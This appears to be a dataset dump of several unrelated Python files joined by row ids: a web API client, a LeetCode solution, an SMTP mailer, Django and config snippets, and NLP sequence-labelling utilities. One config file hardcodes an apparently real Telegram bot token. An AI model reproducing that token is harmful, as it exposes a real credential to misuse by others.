exc = exc_type(message)
except Exception:
pass
if exc is None:
exc = RuntimeError(message)
raise exc
# noinspection PyMethodMayBeStatic
def _query(self, **kwargs):
return {key: value for key, value in kwargs.items() if value is not None}
def _post_data(self, **kwargs):
data = urllib.parse.urlencode(self._query(**kwargs))
return data.encode() if data else None
@classmethod
def get_traceback_header(cls) -> str:
traceback_title = 'Cate WebAPI service traceback'
traceback_line = len(traceback_title) * '='
return '\n' + traceback_line + '\n' + traceback_title + '\n' + traceback_line + '\n'
@property
def root_path(self) -> Optional[str]:
return None
def resolve_path(self, path: str) -> str:
return path
def resolve_workspace_dir(self, path_or_name: str) -> str:
return path_or_name
def get_open_workspaces(self) -> List[Workspace]:
json_list = self._invoke_method("get_open_workspaces", dict(), timeout=WEBAPI_WORKSPACE_TIMEOUT)
return [Workspace.from_json_dict(ws_json_dict) for ws_json_dict in json_list]
def list_workspace_names(self) -> List[str]:
json_list = self._invoke_method("list_workspace_names", dict(), timeout=WEBAPI_WORKSPACE_TIMEOUT)
return json_list
def get_workspace(self, base_dir: str) -> Workspace:
json_dict = self._invoke_method("get_workspace", dict(base_dir=base_dir), timeout=WEBAPI_WORKSPACE_TIMEOUT)
return Workspace.from_json_dict(json_dict)
def new_workspace(self, base_dir: str, description: str = None) -> Workspace:
json_dict = self._invoke_method("new_workspace", dict(base_dir=base_dir, description=description),
timeout=WEBAPI_WORKSPACE_TIMEOUT)
return Workspace.from_json_dict(json_dict)
def open_workspace(self, base_dir: str, monitor: Monitor = Monitor.NONE) -> Workspace:
json_dict = self._invoke_method("open_workspace", dict(base_dir=base_dir),
timeout=WEBAPI_WORKSPACE_TIMEOUT,
monitor=monitor)
return Workspace.from_json_dict(json_dict)
def close_workspace(self, base_dir: str) -> None:
self._invoke_method("close_workspace", dict(base_dir=base_dir), timeout=WEBAPI_WORKSPACE_TIMEOUT)
def close_all_workspaces(self) -> None:
self._invoke_method("close_all_workspaces", dict(), timeout=WEBAPI_WORKSPACE_TIMEOUT)
def save_workspace_as(self, base_dir: str, to_dir: str, monitor: Monitor = Monitor.NONE) -> Workspace:
json_dict = self._invoke_method("save_workspace_as",
dict(base_dir=base_dir, to_dir=to_dir),
timeout=WEBAPI_WORKSPACE_TIMEOUT,
monitor=monitor)
return Workspace.from_json_dict(json_dict)
def save_workspace(self, base_dir: str, monitor: Monitor = Monitor.NONE) -> Workspace:
json_dict = self._invoke_method("save_workspace", dict(base_dir=base_dir),
timeout=WEBAPI_WORKSPACE_TIMEOUT,
monitor=monitor)
return Workspace.from_json_dict(json_dict)
def save_all_workspaces(self, monitor: Monitor = Monitor.NONE) -> None:
self._invoke_method("save_all_workspaces", dict(), timeout=WEBAPI_WORKSPACE_TIMEOUT, monitor=monitor)
def delete_workspace(self, base_dir: str, remove_completely: bool = False) -> None:
self._invoke_method("delete_workspace",
dict(base_dir=base_dir, remove_completely=remove_completely),
timeout=WEBAPI_WORKSPACE_TIMEOUT)
def clean_workspace(self, base_dir: str) -> Workspace:
json_dict = self._invoke_method("clean_workspace", dict(base_dir=base_dir), timeout=WEBAPI_WORKSPACE_TIMEOUT)
return Workspace.from_json_dict(json_dict)
def run_op_in_workspace(self, base_dir: str, op_name: str, op_args: OpKwArgs,
monitor: Monitor = Monitor.NONE) -> Union[Any, None]:
return self._invoke_method("run_op_in_workspace",
dict(base_dir=base_dir, op_name=op_name, op_args=op_args),
timeout=WEBAPI_WORKSPACE_TIMEOUT,
monitor=monitor)
def delete_workspace_resource(self, base_dir: str, res_name: str) -> Workspace:
json_dict = self._invoke_method("delete_workspace_resource",
dict(base_dir=base_dir, res_name=res_name),
timeout=WEBAPI_RESOURCE_TIMEOUT)
return Workspace.from_json_dict(json_dict)
def set_workspace_resource_persistence(self, base_dir: str, res_name: str, persistent: bool) -> Workspace:
json_dict = self._invoke_method("set_workspace_resource_persistence",
dict(base_dir=base_dir, res_name=res_name, persistent=persistent),
timeout=WEBAPI_RESOURCE_TIMEOUT)
return Workspace.from_json_dict(json_dict)
def set_workspace_resource(self,
base_dir: str,
op_name: str,
op_args: OpKwArgs,
res_name: Optional[str] = None,
overwrite: bool = False,
monitor: Monitor = Monitor.NONE) -> Tuple[Workspace, str]:
json_list = self._invoke_method("set_workspace_resource",
dict(base_dir=base_dir, res_name=res_name, op_name=op_name,
op_args=op_args, overwrite=overwrite),
timeout=WEBAPI_RESOURCE_TIMEOUT,
monitor=monitor)
return Workspace.from_json_dict(json_list[0]), json_list[1]
def rename_workspace_resource(self, base_dir: str,
res_name: str, new_res_name: str) -> Workspace:
json_dict = self._invoke_method("rename_workspace_resource",
dict(base_dir=base_dir, res_name=res_name, new_res_name=new_res_name),
timeout=WEBAPI_RESOURCE_TIMEOUT)
return Workspace.from_json_dict(json_dict)
def write_workspace_resource(self, base_dir: str, res_name: str,
file_path: str, format_name: str = None,
monitor: Monitor = Monitor.NONE) -> None:
self._invoke_method("write_workspace_resource",
dict(base_dir=base_dir, res_name=res_name,
file_path=file_path, format_name=format_name),
timeout=WEBAPI_RESOURCE_TIMEOUT)
def plot_workspace_resource(self, base_dir: str, res_name: str,
var_name: str = None, file_path: str = None,
monitor: Monitor = Monitor.NONE) -> None:
url = self._url('/ws/res/plot/{base_dir}/{res_name}',
path_args=dict(base_dir=base_dir, res_name=res_name),
query_args=self._query(var_name=var_name, file_path=file_path))
self._fetch_json(url, timeout=WEBAPI_RESOURCE_TIMEOUT + WEBAPI_PLOT_TIMEOUT)
def print_workspace_resource(self, base_dir: str, res_name_or_expr: str = None,
monitor: Monitor = Monitor.NONE) -> None:
self._invoke_method("print_workspace_resource",
dict(base_dir=base_dir, res_name_or_expr=res_name_or_expr),
timeout=WEBAPI_RESOURCE_TIMEOUT,
monitor=monitor)
def _create_scratch_dir(self, scratch_dir_name: str) -> str:
return ''
def _resolve_target_path(self, target_dir: str) -> str:
return ''
class WebSocketClient(object):
def __init__(self, url):
self.url = url
self.connection = None
self.current_method_id = 1
def connect(self, timeout: float):
ioloop.IOLoop.current().run_sync(self._connect, timeout=timeout)
def invoke_method(self, method, params, timeout, monitor: Monitor) -> dict:
json_rpc_request = self._new_rpc_request(method, params)
def do_json_rpc() -> dict:
return _do_json_rpc(self.connection, json_rpc_request, monitor)
return ioloop.IOLoop.current().run_sync(do_json_rpc, timeout=timeout)
def close(self):
if self.connection is not None:
self.connection.close()
self.connection = None
@gen.coroutine
def _connect(self):
self.connection = yield websocket.websocket_connect(self.url)
def _new_rpc_request(self, method_name, method_params) -> dict:
return dict(jsonrpc='2.0',
id=self._new_method_id(),
method=method_name,
params=method_params)
def _new_method_id(self) -> int:
new_method_id = self.current_method_id
self.current_method_id += 1
return new_method_id
@gen.coroutine
def _do_json_rpc(web_socket, rpc_request: dict, monitor: Monitor) -> dict:
web_socket.write_message(json.dumps(rpc_request))
work_reported = None
started = False
while True and (monitor is None or not monitor.is_cancelled()):
response_str = yield web_socket.read_message()
rpc_response = json.loads(response_str)
if 'progress' in rpc_response:
if monitor:
progress = rpc_response['progress']
total = progress.get('total')
label = progress.get('label')
worked = progress.get('worked')
msg = progress.get('message')
if not started:
monitor.start(label or "start", total_work=total)
started = True
if started:
if worked:
if work_reported is None:
work_reported = 0.0
work = worked - work_reported
work_reported = worked
else:
work = None
monitor.progress(work=work, msg=msg)
else:
if monitor and started:
monitor.done()
return rpc_response
return {}
|
991,427 | 5a64663eac9081e21b38069579274cae7cfedafc | # -*- coding: utf-8 -*-
# @Time : 2019/1/9 15:24
# @Author : Junee
# @FileName: 868二进制间距.py
# @Software : PyCharm
# Observing PEP 8 coding style
class Solution(object):
def binaryGap(self, N):
"""
:type N: int
:rtype: int
"""
N = list(str(bin(N)))
temp = []
for i in range(len(N)):
if N[i] == '1':
temp.append(i)
if len(temp) < 2:
return 0
else:
res = [temp[i+1]-temp[i] for i in range(len(temp)-1)]
return max(res) |
991,428 | 88817ca6c6134942e50c4aff91738c514d92ecaa | import email, smtplib, ssl
from email import encoders
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
class SendMail():
def __init__(self, content):
# Create a multipart message and set headers
password = content["password"]
message = MIMEMultipart()
message["From"] = content['sender_email']
message["To"] = content['receiver_email']
message["Subject"] = content['subject']
# Add body to email
message.attach(MIMEText(content['body'], "plain"))
directory = content['directory']
filename = content['filename']
# Open PDF file in binary mode
with open(directory+filename, "rb") as attachment:
# Add file as application/octet-stream
# Email client can usually download this automatically as attachment
part = MIMEBase("application", "octet-stream")
part.set_payload(attachment.read())
# Encode file in ASCII characters to send by email
encoders.encode_base64(part)
# Add header as key/value pair to attachment part
part.add_header(
"Content-Disposition",
f"attachment; filename= {filename}",
)
# Add attachment to message and convert message to string
message.attach(part)
text = message.as_string()
# Log in to server using secure context and send email
context = ssl.create_default_context()
with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as server:
server.login(content['sender_email'], content['password'])
server.sendmail(content['sender_email'], content['receiver_email'], text)
|
991,429 | b36ae566985cf16ac84f23c608db0de26c8506be | from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
# Create your models here.
class User_profile(models.Model) :
ezpdf_user = models.OneToOneField(User , on_delete = models.CASCADE)
folder_id = models.CharField(max_length=44)
|
991,430 | 49f4b2fa5c0332989c09610b2f8ea5e8e14490f4 | from mworks.conduit import *
import time, sys
client = IPCClientConduit("python_bridge_plugin_conduit")
def hello_x(evt):
print("got evt")
print("evt.code = %i" % evt.code)
print("evt.data = %d" % evt.data)
print("evt.time = %i" % evt.time)
client.initialize()
client.register_callback_for_name("x", hello_x)
time.sleep(0.2)
while True:
pass # probably should looks for a keypress or something
server.finalize()
client.finalize()
|
991,431 | 33f44572032eed73e9ee7fd655af110a744eac7b | #token
TOKEN = '732030625:AAHXvNnqwLREd1u6-nIyXqX_ZfL2PbKmwAA'
#language
from bot import rus_text
from bot import eng_text
DEFAULT_LANGUAGE = 'ru'
TEXT = {
'ru': rus_text,
'ENG': eng_text
}
|
991,432 | 08ec9397be6530c5a0095952df8ad61d71107444 | '''
Constants Module
'''
''' Hue/Intensity Gesture Skin Detector Constants'''
class SkinCons(object):
HUE_LT = 3
HUE_UT = 50
INTENSITY_LT = 15
INTENSITY_UT = 250
''' Three Gesture Constants - Depth Lowerbound/UppperBound; Area Lowerbound/UppperBound'''
class GesConsAttributes(object):
pass
class GesCons(object):
# 21.8, 741, 0.173
FIST = GesConsAttributes()
FIST.DEPTH_L = 20.0
FIST.DEPTH_U = 30.0
FIST.AREA_L = 0.15
FIST.AREA_U = 0.22
# 15.9, 915, 0.10996
SCISSORS = GesConsAttributes()
SCISSORS.DEPTH_L = 15.0
SCISSORS.DEPTH_U = 20.0
SCISSORS.AREA_L = 0.02
SCISSORS.AREA_U = 0.15
# 13.55, 1456, 0.247 ~ 0.634
PALM = GesConsAttributes()
PALM.DEPTH_L = 4.0
PALM.DEPTH_U = 14.5
PALM.AREA_L = 0.22
PALM.AREA_U = 0.65
|
991,433 | 6d33ac5cab71eda9d44e62e0757e75a32d31bcc8 | import io
import numpy as np
import os
import pygtrie
import tempfile
# shared global variables to be imported from model also
UNK = "$UNK$"
NUM = "$NUM$"
NONE = "O"
# special error message
class MyIOError(Exception):
def __init__(self, filename):
# custom error message
message = """
ERROR: Unable to locate file {}.
FIX: Have you tried running python build_data.py first?
This will build vocab file from your train, test and dev sets and
trimm your word vectors.
""".format(filename)
super(MyIOError, self).__init__(message)
class CoNLLDataset(object):
"""Class that iterates over CoNLL Dataset
__iter__ method yields a tuple (words, tags)
words: list of raw words
tags: list of raw tags
If processing_word and processing_tag are not None,
optional preprocessing is appplied
Example:
```python
data = CoNLLDataset(filename)
for sentence, tags in data:
pass
```
"""
def __init__(self, file, processing_word=None, processing_tag=None,
processing_dict=None, processing_intent=None, max_iter=None, max_sent_len=None):
"""
Args:
file: a path to text file or a file object
processing_words: (optional) function that takes a word as input
processing_tags: (optional) function that takes a tag as input
processing_dict: (optional) function to takes a sentence as input
max_iter: (optional) max number of sentences to yield
"""
self.file = file
self.processing_word = processing_word
self.processing_tag = processing_tag
self.processing_dict = processing_dict
self.processing_intent = processing_intent
self.max_iter = max_iter
self.length = None
self.max_sent_len = max_sent_len
def __iter__(self):
niter = 0
with open(self.file, encoding='utf-8') if isinstance(self.file, str) else self.file as f:
intent, words, tags = '', [], []
for line in f:
line = line.strip()
if len(line) == 0 or line.startswith("-DOCSTART-"):
if len(words) != 0:
niter += 1
if self.max_iter is not None and niter > self.max_iter:
break
# add dictionary feature
if self.processing_dict is not None:
# for word processing, we expect all ids
# (letter trigram id, char id and word id, ...) are extracted
if len(words) > 0 and type(words[0]) is not tuple:
raise Exception("Unexpected, word is not a tuple")
word_ids = [word[-1] for word in words]
dict_ids = self.processing_dict(word_ids)
words = list(map(lambda w, d: ((d,) + w), words, dict_ids))
# max_sent_len
if self.max_sent_len is not None:
words = words[:self.max_sent_len]
tags = tags[:self.max_sent_len]
# intent
if not intent:
intent = 'none'
if self.processing_intent is not None:
intent = self.processing_intent(intent)
yield intent, words, tags
intent, words, tags = '', [], []
else:
ls = line.split(' ')
if len(ls) == 1:
if len(intent) != 0:
raise Exception('Unexpected line: {}'.format(line))
else:
intent = line
else:
word, tag = ls[0],ls[-1]
if self.processing_word is not None:
word = self.processing_word(word)
if self.processing_tag is not None:
tag = self.processing_tag(tag)
words += [word]
tags += [tag]
def __len__(self):
"""Iterates once over the corpus to set and store length"""
if self.length is None:
self.length = 0
for _ in self:
self.length += 1
return self.length
def get_CoNLL_dataset(filename, config, task_id):
return CoNLLDataset(filename, config.processing_word,
config.processing_tasks_tag[task_id],
config.processing_dict, config.processing_task_intents[task_id],
config.max_iter, config.max_sent_len)
def get_vocabs(datasets):
"""Build vocabulary from an iterable of datasets objects
Args:
datasets: a list of dataset objects
Returns:
a set of all the words in the dataset
"""
print("Building vocab...")
vocab_intents = set()
vocab_words = set()
vocab_tags = set()
for dataset in datasets:
for intent, words, tags in dataset:
vocab_intents.add(intent)
vocab_words.update(words)
vocab_tags.update(tags)
print("- done. {} tokens".format(len(vocab_words)))
return vocab_intents, vocab_words, vocab_tags
def get_letter_trigrams(word):
bounded_word = '#' + word + '#'
letter_trigrams = [bounded_word[i:i+3] for i in range(len(bounded_word) - 2)]
# to remove cases like " 16" in "+65 6272 1626" (not ascii space)
letter_trigrams = [t for t in letter_trigrams if len(t.strip()) == 3]
return letter_trigrams
def get_letter_trigram_vocab(vocab_words):
vocab_letter_trigrams = set()
for word in vocab_words:
vocab_letter_trigrams.update(get_letter_trigrams(word))
return vocab_letter_trigrams
def get_chunk_vocab(vocab_tags):
vocab_chunk_types = set()
for tag in vocab_tags:
_, chunk_type = get_chunk_type_from_name(tag)
vocab_chunk_types.add(chunk_type)
return vocab_chunk_types
def get_char_vocab(datasets, chars_lowercase=False):
"""Build char vocabulary from an iterable of datasets objects
Args:
dataset: a iterator yielding tuples (sentence, tags)
Returns:
a set of all the characters in the dataset
"""
vocab_char = set()
for dataset in datasets:
for _, words, _ in dataset:
for word in words:
if chars_lowercase:
word = word.lower()
vocab_char.update(word)
return vocab_char
def get_glove_vocab(filename):
"""Load vocab from file
Args:
filename: path to the glove vectors
Returns:
vocab: set() of strings
"""
print("Building vocab...")
vocab = set()
with open(filename, encoding='utf-8') as f:
for line in f:
# print(line.split(' ')[0])
word = line.strip().split(' ')[0]
vocab.add(word)
print("- done. {} tokens".format(len(vocab)))
return vocab
def get_class_weights(filename, classes_num=None):
if os.path.exists(filename):
weights = []
with open(filename, encoding='utf-8') as f:
for line in f:
line = line.strip()
if line:
weights.append(float(line))
return weights
elif classes_num is not None:
return [1.0] * classes_num
else:
raise Exception('Invalid class weights: {}'.format(filename))
def write_vocab(vocab, filename):
"""Writes a vocab to a file
Writes one word per line.
Args:
vocab: iterable that yields word
filename: path to vocab file
Returns:
write a word per line
"""
print("Writing vocab...")
with open(filename, "w", encoding='utf-8') as f:
for i, word in enumerate(vocab):
if i != len(vocab) - 1:
f.write("{}\n".format(word))
else:
f.write(word)
print("- done. {} tokens".format(len(vocab)))
def load_vocab(filename):
"""Loads vocab from a file
Args:
filename: (string) the format of the file must be one word per line.
Returns:
d: dict[word] = index
"""
try:
d = dict()
with open(filename, encoding='utf-8') as f:
for idx, word in enumerate(f):
word = word.strip()
d[word] = idx
except IOError:
raise MyIOError(filename)
return d
def trim_words(word_set, data_sets, num):
"""
trim words number to num
Args:
word_set: word set
data_sets: data set list
num: trim number
"""
word_dict = {}
for data in data_sets:
for word_list, _ in data:
for word in word_list:
if word not in word_set:
continue
if word in word_dict:
word_dict[word] += 1
else:
word_dict[word] = 1
sorted_list = sorted(word_dict.keys(), key=lambda w: word_dict[w], reverse=True)
result_set = set()
result_set.update(sorted_list[:num])
return result_set
def export_trimmed_glove_vectors(vocab, glove_filename, trimmed_filename, dim):
"""Saves glove vectors in numpy array
Args:
vocab: dictionary vocab[word] = index
glove_filename: a path to a glove file
trimmed_filename: a path where to store a matrix in npy
dim: (int) dimension of embeddings
"""
embeddings = np.zeros([len(vocab), dim])
with open(glove_filename, encoding='utf-8') as f:
for line in f:
line = line.strip().split(' ')
word = line[0]
embedding = [float(x) for x in line[1:]]
if word in vocab:
word_idx = vocab[word]
embeddings[word_idx] = np.asarray(embedding)
np.savez_compressed(trimmed_filename, embeddings=embeddings)
def get_trimmed_glove_vectors(filename):
"""
Args:
filename: path to the npz file
Returns:
matrix of embeddings (np array)
"""
try:
with np.load(filename) as data:
return data["embeddings"]
except IOError:
raise MyIOError(filename)
def concate_list_and_tuple(a_list, b_num_or_tuple):
if type(b_num_or_tuple) is tuple:
result = a_list, *b_num_or_tuple
else:
result = a_list, b_num_or_tuple
return result
def get_processing_word(vocab_words=None, vocab_chars=None,
vocab_letter_trigrams=None, lowercase=False,
chars=False, chars_lowercase=False, letter_trigrams=False, allow_unk=True, max_word_len=None):
"""Return lambda function that transform a word (string) into list,
or tuple of (list, id) of int corresponding to the ids of the word and
its corresponding characters.
Args:
vocab: dict[word] = idx
Returns:
f("cat") = ([12, 4, 32], 12345)
= (list of char ids, word id)
"""
def f(word):
# 0. get chars of words
if vocab_chars is not None and chars:
char_ids = []
char_word = word
if chars_lowercase:
char_word = char_word.lower()
for char in char_word:
# ignore chars out of vocabulary
if char in vocab_chars:
char_ids += [vocab_chars[char]]
if max_word_len is not None:
char_ids = char_ids[:max_word_len]
# 1. preprocess word
if lowercase:
word = word.lower()
if word.isdigit():
word = NUM
# 2. get id of letter trigrams
if vocab_letter_trigrams is not None and letter_trigrams == True:
letter_trigram_ids = []
for l3t in get_letter_trigrams(word):
# ignore letter trigrams out of vocabulary
if l3t in vocab_letter_trigrams:
letter_trigram_ids += [vocab_letter_trigrams[l3t]]
if max_word_len is not None:
letter_trigram_ids = letter_trigram_ids[:max_word_len]
# 3. get id of word
if vocab_words is not None:
if word in vocab_words:
word = vocab_words[word]
else:
if allow_unk:
word = vocab_words[UNK]
#else:
# raise Exception("Unknown key is not allowed. Check that "\
# "your vocab (tags?) is correct")
# 4. return tuple: letter trigram ids, char ids, word id
result = word
if vocab_chars is not None and chars == True:
result = concate_list_and_tuple(char_ids, result)
if vocab_letter_trigrams is not None and letter_trigrams == True:
result = concate_list_and_tuple(letter_trigram_ids, result)
return result
return f
def get_processing_dict(trie, ndict_types, trie_separator='.s'):
def f(word_ids):
word_ids = [str(word_id) for word_id in word_ids]
dict_feat = [[0] * 2 * ndict_types for word_id in word_ids]
for i in range(len(word_ids)):
sent = trie_separator.join(word_ids[i:])
prefix, dict_type = trie.longest_prefix(sent)
if dict_type is not None:
dict_feat[i][2 * dict_type] = 1
for j in range(1, len(prefix.split(trie_separator))):
dict_feat[i + j][2 * dict_type + 1] = 1
return tuple(dict_feat)
return f
def _pad_sequences(sequences, pad_tok, max_length):
"""
Args:
sequences: a generator of list or tuple
pad_tok: the char to pad with
Returns:
a list of list where each sublist has same length
"""
sequence_padded, sequence_length = [], []
for seq in sequences:
seq = list(seq)
seq_ = seq[:max_length] + [pad_tok]*max(max_length - len(seq), 0)
sequence_padded += [seq_]
sequence_length += [min(len(seq), max_length)]
return sequence_padded, sequence_length
def pad_sequences(sequences, pad_tok, nlevels=1):
"""
Args:
sequences: a generator of list or tuple
pad_tok: the char to pad with
nlevels: "depth" of padding, for the case where we have characters ids
Returns:
a list of list where each sublist has same length
"""
if nlevels == 1:
max_length = max(map(lambda x : len(x), sequences))
sequence_padded, sequence_length = _pad_sequences(sequences,
pad_tok, max_length)
elif nlevels == 2:
max_length_word = max([max(map(lambda x: len(x), seq))
for seq in sequences])
sequence_padded, sequence_length = [], []
for seq in sequences:
# all words are same length now
sp, sl = _pad_sequences(seq, pad_tok, max_length_word)
sequence_padded += [sp]
sequence_length += [sl]
max_length_sentence = max(map(lambda x : len(x), sequences))
sequence_padded, _ = _pad_sequences(sequence_padded,
[pad_tok]*max_length_word, max_length_sentence)
sequence_length, _ = _pad_sequences(sequence_length, 0,
max_length_sentence)
return sequence_padded, sequence_length
def minibatches(data, minibatch_size):
"""
Args:
data: generator of (sentence, tags) tuples
minibatch_size: (int)
Yields:
list of tuples
"""
intent_batch, x_batch, y_batch = [], [], []
for (intent, x, y) in data:
if len(x_batch) == minibatch_size:
yield intent_batch, x_batch, y_batch
intent_batch, x_batch, y_batch = [], [], []
if type(x[0]) == tuple:
x = list(zip(*x))
intent_batch.append(intent)
x_batch += [x]
y_batch += [y]
if len(x_batch) != 0:
yield intent_batch, x_batch, y_batch
def get_chunk_type(tok, idx_to_tag):
"""
Args:
tok: id of token, ex 4
idx_to_tag: dictionary {4: "B-PER", ...}
Returns:
tuple: "B", "PER"
"""
tag_name = idx_to_tag[tok]
return get_chunk_type_from_name(tag_name)
def get_chunk_type_from_name(tag_name):
tag_class = tag_name.split('-')[0]
tag_type = tag_name.split('-')[-1]
return tag_class, tag_type
def get_chunks(seq, tags):
"""Given a sequence of tags, group entities and their position
Args:
seq: [4, 4, 0, 0, ...] sequence of labels
tags: dict["O"] = 4
Returns:
list of (chunk_type, chunk_start, chunk_end)
Example:
seq = [4, 5, 0, 3]
tags = {"B-PER": 4, "I-PER": 5, "B-LOC": 3}
result = [("PER", 0, 2), ("LOC", 3, 4)]
"""
default = tags[NONE]
idx_to_tag = {idx: tag for tag, idx in tags.items()}
chunks = []
chunk_type, chunk_start = None, None
for i, tok in enumerate(seq):
# End of a chunk 1
if tok == default and chunk_type is not None:
# Add a chunk.
chunk = (chunk_type, chunk_start, i)
chunks.append(chunk)
chunk_type, chunk_start = None, None
# End of a chunk + start of a chunk!
elif tok != default:
tok_chunk_class, tok_chunk_type = get_chunk_type(tok, idx_to_tag)
if chunk_type is None:
chunk_type, chunk_start = tok_chunk_type, i
elif tok_chunk_type != chunk_type or tok_chunk_class == "B":
chunk = (chunk_type, chunk_start, i)
chunks.append(chunk)
chunk_type, chunk_start = tok_chunk_type, i
else:
pass
# end condition
if chunk_type is not None:
chunk = (chunk_type, chunk_start, len(seq))
chunks.append(chunk)
return chunks
def get_all_chunks(seq, tags):
"""Also include O chunk
Example:
seq = [4, 5, 0, 3]
tags = {"B-PER": 4, "I-PER": 5, "B-LOC": 3, "O": 0}
result = [("PER", 0, 2), ('O', 2, 3) ("LOC", 3, 4)]
"""
default = tags[NONE]
idx_to_tag = {idx: tag for tag, idx in tags.items()}
chunks = []
chunk_type, chunk_start = None, None
for i, tok in enumerate(seq):
tok_chunk_class, tok_chunk_type = get_chunk_type(tok, idx_to_tag)
if tok_chunk_class == "B" or tok_chunk_type != chunk_type:
if chunk_type is not None and chunk_start is not None:
chunk = (chunk_type, chunk_start, i)
chunks.append(chunk)
chunk_type = tok_chunk_type
chunk_start = i
if chunk_type is not None and chunk_start is not None:
chunk = (chunk_type, chunk_start, len(seq))
chunks.append(chunk)
# verify
if set([c for c in chunks if c[0] != NONE]) != set(get_chunks(seq, tags)):
raise Exception("Result of get_all_chunks is inconsistent with get_chunks")
return chunks
def get_pr(metrics):
out_metrics = np.vstack([
np.divide(metrics[:, 0], metrics[:, 1], out=np.zeros_like(metrics[:, 0]), where=metrics[:, 0]!=0),
np.divide(metrics[:, 0], metrics[:, 2], out=np.zeros_like(metrics[:, 0]), where=metrics[:, 0]!=0)
]).transpose()
divisor = 2 * np.multiply(out_metrics[:, 0], out_metrics[:, 1])
dividend = np.add(out_metrics[:, 0], out_metrics[:, 1])
out_metrics = np.hstack([
out_metrics,
np.divide(divisor, dividend, out=np.zeros_like(divisor), where=dividend!=0).reshape(-1, 1)
])
return out_metrics
def get_ordered_keys(dictionary):
return [e[0] for e in sorted(dictionary.items(), key=lambda e: e[1])]
def get_dict_trie(dict_file_name, processing_word=None, processing_dict_type=None, trie_separator='.'):
trie = pygtrie.StringTrie(separator=trie_separator)
paths = []
dict_types = set()
UNK_word_id = processing_word(UNK) if processing_word is not None else -1
with open(dict_file_name, encoding='utf-8') as f:
for line in f:
line = line.strip()
if line:
sent, dict_type = line.split('\t')
if processing_word is not None:
word_ids = [processing_word(word) for word in sent.split(' ')]
if UNK_word_id in word_ids:
continue
sent = trie_separator.join([str(word_id) for word_id in word_ids])
if processing_dict_type is not None:
dict_type = processing_dict_type(dict_type)
trie[sent] = dict_type
paths.append('{}\t{}'.format(sent, dict_type))
dict_types.add(dict_type)
return trie, paths, list(dict_types)
def create_memory_file_from_words(words):
return io.StringIO('{}\n\n'.format('\n'.join(['{} O'.format(w) for w in words])))
def get_task_vocab(filenames):
if all('_' in filename for filename in filenames):
return [filename.rsplit('.', 1)[0].rsplit('_', 1)[1] for filename in filenames]
else:
return list(str(i) for i in range(len(filenames)))
def get_name_for_task(prefix, task_name):
return "{}_{}.txt".format(prefix, task_name)
def merge_lists_alternate(lists, len_per_list):
result = []
list_num = len(lists)
indexes = [0] * list_num
list_lens = [len(l) for l in lists]
for _ in range(len_per_list):
for i in range(list_num):
result.append(lists[i][indexes[i]])
indexes[i] = (indexes[i] + 1) % list_lens[i]
return result
def merge_datasets(datasets, batch_size, random_seed, mode):
datasets_mbs = []
for i, dataset in enumerate(datasets):
datasets_mbs.append([(i, mb_enum) for mb_enum in enumerate(minibatches(dataset, batch_size))])
if mode == 'permute':
first_mbs = [mbs[0] for mbs in datasets_mbs]
remaining_mbs = [mb for mbs in datasets_mbs for mb in mbs[1:]]
np.random.RandomState(seed=random_seed).shuffle(remaining_mbs)
return first_mbs + remaining_mbs
elif mode == 'cycle':
for mbs in datasets_mbs:
np.random.RandomState(seed=random_seed).shuffle(mbs)
return merge_lists_alternate(datasets_mbs, max(len(mbs) for mbs in datasets_mbs))
else:
raise Exception('Unsupported mode: {}'.format(mode))
if __name__ == "__main__":
seq = [4, 5, 0, 3]
tags = {"B-PER": 4, "I-PER": 5, "B-LOC": 3, "O": 0}
# Expected: [("PER", 0, 2), ('O', 2, 3) ("LOC", 3, 4)]
result = get_all_chunks(seq, tags)
print(result)
print([c for c in result if c[0] != NONE] == get_chunks(seq, tags))
seq = [4, 5, 5, 4, 0, 0, 3, 5, 3]
tags = {"B-PER": 4, "I-PER": 5, "B-LOC": 3, "O": 0}
# Expected: [('PER', 0, 3), ('PER', 3, 4), ('O', 4, 6), ('LOC', 6, 7), ('PER', 7, 8), ('LOC', 8, 9)]
result = get_all_chunks(seq, tags)
print(result)
print([c for c in result if c[0] != NONE] == get_chunks(seq, tags))
tmp_dict_filename = ''
with tempfile.NamedTemporaryFile("w", delete=False) as tmp:
tmp.write("The big bang theory\tTV\n")
tmp.write("Game of the thrones\tTV\n")
tmp.write("Angry Birds\tMOVIE\n")
tmp_dict_filename = tmp.name
trie, _, dict_types = get_dict_trie(tmp_dict_filename)
print(trie)
assert(set(dict_types) == set(['MOVIE', 'TV']))
vocab_words = {'big': 0, 'bang': 1, 'the': 2, 'theory': 3, UNK: 4}
processing_words = get_processing_word(vocab_words, lowercase=True, allow_unk=True)
vocab_dict_types = {'MOVIE': 0, 'TV': 1}
processing_dict_type = get_processing_word(vocab_dict_types)
trie, _, dict_types = get_dict_trie(tmp_dict_filename, processing_words, processing_dict_type)
print(trie)
assert(set(dict_types) == set([0, 1]))
words = [([0], 1), ([0, 1], 5), ([0, 1, 2], 3), ([0, 1, 2, 3], 5),
([0, 1, 2, 3, 4], 4), ([0, 1, 2, 3, 4, 5], 62),
([0, 1, 2, 3, 4, 5, 6], 9)]
sep = '.'
trie = trie = pygtrie.StringTrie(separator=sep)
trie['3.5'] = 1
trie['3.5.4'] = 1
trie['3.5.4.6'] = 1
processing_dict = get_processing_dict(trie, 2, sep)
dict_ids = processing_dict([word[-1] for word in words])
print(dict_ids)
print(list(map(lambda w, d: ((d,) + w), words, dict_ids))) |
991,434 | 087f988cf63b9fb3b4470989f6f89698b4c92bea | '''
Read all the actorlogins csv files saved in the actorlogin
dir and extract all the unique user actorlogins along with
how many times each user interacted with the github
platform. After extracting this information save it into a
unique users file.
(ONE TIME EXECUTION)
'''
import os
csv_files = [x for x in os.listdir() if x.endswith('.csv')]
csv_files = sorted(csv_files)
users = {}
for f in csv_files:
print ("Working on file", f)
with open(f) as fi:
fi.readline()
for user in fi:
u = user.strip().split(" ")[0]
if u in users:
users[u] += 1
else:
users[u] = 1
print ("\nTotal number of unique users:", len(users))
out_file = "unique_users.csv"
print ("\nWriting unique users to file:", out_file)
with open(out_file,"w") as fo:
for k, v in users.items():
fo.write(k + " " + str(v) + "\n")
print ("Done")
|
991,435 | 94ea4dd4c163d3840e2105f2ea2eb00c04127141 | #!/usr/bin/env python
import shelve
import numpy as np
import sys
from rnarry.sequtils import GiantFASTAFile
from rnarry.sequtils import reverse_complement
from rnarry.utils import textwrap
from rnarry.bxwrap import MultiTrackSplitBinnedArray
MINREADSTOCALL = 10
